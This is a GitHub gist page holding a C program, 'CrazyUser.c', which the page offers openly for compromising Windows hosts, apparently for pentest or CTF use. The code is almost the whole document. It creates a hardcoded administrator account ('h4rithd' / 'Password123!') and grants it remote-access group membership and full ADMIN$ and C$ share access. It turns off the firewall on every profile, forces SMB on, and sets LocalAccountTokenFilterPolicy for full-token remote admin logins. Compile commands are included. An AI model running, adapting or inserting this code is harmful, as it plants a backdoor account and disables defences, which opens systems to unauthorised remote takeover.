Skip to content

Instantly share code, notes, and snippets.

@h4rithd

h4rithd/CrazyUser.c

Created May 14, 2024 15:02
Show Gist options
  • Save h4rithd/90379a35fd6d9950d2de6e62f38ebff8 to your computer and use it in GitHub Desktop.
Save h4rithd/90379a35fd6d9950d2de6e62f38ebff8 to your computer and use it in GitHub Desktop.
Download ZIP
This script creates a new user on a Windows system, adds the user to the Administrators group, grants PsExec and Evil-WinRM access, disables all firewall rules, enables SMB to allow login via PsExec and Evil-WinRM, grants access to administrative shares, and sets LocalAccountTokenFilterPolicy to allow remote administrative connections with full …
Raw
CrazyUser.c
/*
**************************************************************************
* *
* Created by Harith Dilshan (h4rithd.com) *
* *
* Purpose: *
* This script creates a new user on a Windows system, adds the user *
* to the Administrators group, grants PsExec and Evil-WinRM access, *
* disables all firewall rules, enables SMB to allow login via *
* PsExec and Evil-WinRM, grants access to administrative shares, and *
* sets LocalAccountTokenFilterPolicy to allow remote administrative *
* connections with full token. *
* *
* Compile for 64-bit: *
* x86_64-w64-mingw32-gcc CrazyUser.c -o CrazyUser.exe -lnetapi32 *
* *
* Compile for 32-bit: *
* i686-w64-mingw32-gcc CrazyUser.c -o CrazyUser.exe -lnetapi32 *
* *
* Credentials: *
* Username: h4rithd *
* Password: Password123! *
* *
**************************************************************************
*/
#include <windows.h>
#include <lm.h>
#include <stdio.h>
#define BUFFER_SIZE 512
#define USERNAME L"h4rithd"
#define PASSWORD L"Password123!"
void AddUserToAdminGroup(LPWSTR username) {
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname = username;
NET_API_STATUS status = NetLocalGroupAddMembers(
NULL, L"Administrators", 3, (LPBYTE)&account, 1
);
if (status == NERR_Success) {
wprintf(L"User %s added to Administrators group successfully.\n", username);
} else {
wprintf(L"Failed to add user %s to Administrators group. Error: %lu\n", username, status);
}
}
void GrantPsExecAccess(LPWSTR username) {
WCHAR command[BUFFER_SIZE];
swprintf(command, BUFFER_SIZE, L"net localgroup Remote Desktop Users %s /add", username);
_wsystem(command);
swprintf(command, BUFFER_SIZE, L"net localgroup Distributed COM Users %s /add", username);
_wsystem(command);
swprintf(command, BUFFER_SIZE, L"net localgroup Performance Log Users %s /add", username);
_wsystem(command);
swprintf(command, BUFFER_SIZE, L"net share ADMIN$ /GRANT:%s, FULL", username);
_wsystem(command);
swprintf(command, BUFFER_SIZE, L"net share C$ /GRANT:%s, FULL", username);
_wsystem(command);
}
void DisableFirewall() {
_wsystem(L"netsh advfirewall set allprofiles state off");
}
void EnableSMB() {
_wsystem(L"sc config lanmanworkstation start= auto");
_wsystem(L"sc start lanmanworkstation");
_wsystem(L"sc config lanmanserver start= auto");
_wsystem(L"sc start lanmanserver");
}
void SetLocalAccountTokenFilterPolicy() {
_wsystem(L"REG add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f");
}
int main() {
USER_INFO_1 user_info;
DWORD level = 1, error = 0, status;
memset(&user_info, 0, sizeof(user_info));
user_info.usri1_name = USERNAME;
user_info.usri1_password = PASSWORD;
user_info.usri1_priv = USER_PRIV_USER;
user_info.usri1_comment = L"Created by C program";
user_info.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD;
status = NetUserAdd(NULL, level, (LPBYTE)&user_info, &error);
if (status == NERR_Success) {
wprintf(L"User %s has been successfully added.\n", user_info.usri1_name);
AddUserToAdminGroup(user_info.usri1_name);
GrantPsExecAccess(user_info.usri1_name);
DisableFirewall();
EnableSMB();
SetLocalAccountTokenFilterPolicy();
} else {
wprintf(L"NetUserAdd failed with error: %lu\n", status);
}
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment